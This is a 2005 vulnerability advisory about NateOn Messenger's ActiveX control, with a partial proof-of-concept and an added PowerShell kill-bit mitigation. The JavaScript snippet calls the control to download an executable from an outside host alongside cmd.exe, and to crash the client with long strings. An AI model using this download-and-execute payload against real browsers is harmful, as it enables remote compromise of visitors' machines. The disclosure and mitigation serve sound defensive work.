[VulnWatch] [NRVA05-08] - Arbitrary file download by NateOn Messagener's ActiveX and DoS

From: saintlinu (saintlinu_at_yahoo.co.kr)
Date: 09/29/05

    To: <bugtraq@securityfocus.com>, <vulnwatch@vulnwatch.org>, <full-disclosure@lists.grok.org.uk>
    Date: Thu, 29 Sep 2005 11:36:27 +0800
    
    

    Title: Arbitrary File Download by NateOn Messenger's ActiveX and DoS

    Discoverer: PARK, GYU TAE (saintlinu@null2root.org)

    Advisory No.: NRVA05-08

    Criticality: Moderately Critical

    Impact: Arbitrary file download by NateOn Messenger's ActiveX and DoS

    Where: From remote

    Operating System: Windows Only

    Solution: Not patched yet

    Workaround: N/A

     

    Notice: 09. 17. 2005 Initial notification sent to vendor
            09. 23. 2005 2nd notification
            09. 27. 2005 3rd notification
            09. 29. 2005 Vendor did not respond; vulnerability disclosed

     

    Description:

    NateOn Messenger (see NRVA05-02) is an Internet instant messenger, like MSN, Yahoo and others.

     

    If NateOn Messenger is installed, any web page can exploit it through the
    'NateonDownloadManager.ocx' ActiveX control it registers.

     

    There is also a second vulnerability resembling a buffer overflow, which crashes the client (DoS).

     

    See the following details:

     

    The full proof of concept is not included here, only a piece of the code:

     

    <--snip-->

        // GotNate is assumed to be the NateonDownloadManager.ocx ActiveX object
        // created in the part of the page that was snipped above
        i = GotNate.IsNateonInstall();

        if( i == 1 ) {
            alert('NateOn Messenger already installed. Do Attack ...');

            // if you want a second-order attack then try
            i = GotNate.Excute("1", 'http://saintlinu.null2root.org/gotit.exe', 'c:\\windows\\system32\\cmd.exe');

            // if you want to crash the victim system then try
            i = GotNate.Excute("1", 'http://saintlinu.null2root.org/gotit.exe', 'very_long_strings_in_here');

        } else {
            alert('NateOn Messenger NOT Installed');
        }

    </--snip-->
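    Since no vendor patch exists, the practical host-side mitigation is Internet Explorer's ActiveX "kill bit". The following PowerShell is an added defensive example, not part of the advisory or of NateOn: it locates every CLSID whose InprocServer32 points at NateonDownloadManager.ocx (the advisory does not give the CLSID, so it is discovered from the registry) and sets the documented COMPAT_EVIL_DONT_LOAD flag (0x400, Microsoft KB240797) under the ActiveX Compatibility keys, so a web page can no longer instantiate the control. It assumes an elevated session.

```powershell
# Added defensive example (not from the advisory): set the IE kill bit for the
# NateonDownloadManager.ocx control. Run from an elevated PowerShell session.
$OcxName = 'NateonDownloadManager.ocx'
# 0x400 = COMPAT_EVIL_DONT_LOAD (Microsoft KB240797): IE refuses to load the control.
$KillBit = 0x400

# The advisory does not give the control's CLSID, so find every CLSID whose
# InprocServer32 default value points at the OCX file.
$clsids = Get-ChildItem 'Registry::HKEY_CLASSES_ROOT\CLSID' -ErrorAction SilentlyContinue |
    ForEach-Object {
        $srv = Get-ItemProperty -Path "$($_.PSPath)\InprocServer32" -ErrorAction SilentlyContinue
        if ($srv -and $srv.'(default)' -like "*\$OcxName") { $_.PSChildName }
    }

if (-not $clsids) { throw "No CLSID registered for $OcxName; is NateOn installed?" }

# Kill-bit locations for 32-bit and 64-bit IE (the second exists only on 64-bit Windows).
$bases = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
)

foreach ($clsid in $clsids) {
    foreach ($base in $bases) {
        # Skip the Wow6432Node hive on 32-bit hosts where it does not exist
        if (-not (Test-Path (Split-Path $base -Parent))) { continue }
        $key = Join-Path $base $clsid
        if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
        $cur = (Get-ItemProperty -Path $key -Name 'Compatibility Flags' -ErrorAction SilentlyContinue).'Compatibility Flags'
        $new = [int]$cur -bor $KillBit          # keep any flags already present
        Set-ItemProperty -Path $key -Name 'Compatibility Flags' -Value $new -Type DWord
        # Verify the bit is really set before reporting success
        $flags = (Get-ItemProperty -Path $key -Name 'Compatibility Flags').'Compatibility Flags'
        if (($flags -band $KillBit) -ne $KillBit) { throw "Kill bit not set under $key" }
        Write-Output "Kill bit set for $clsid under $base"
    }
}
```

    The kill bit only stops browser-hosted instantiation; it does not change the control's own file-path or length handling, so the vendor fix is still required.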
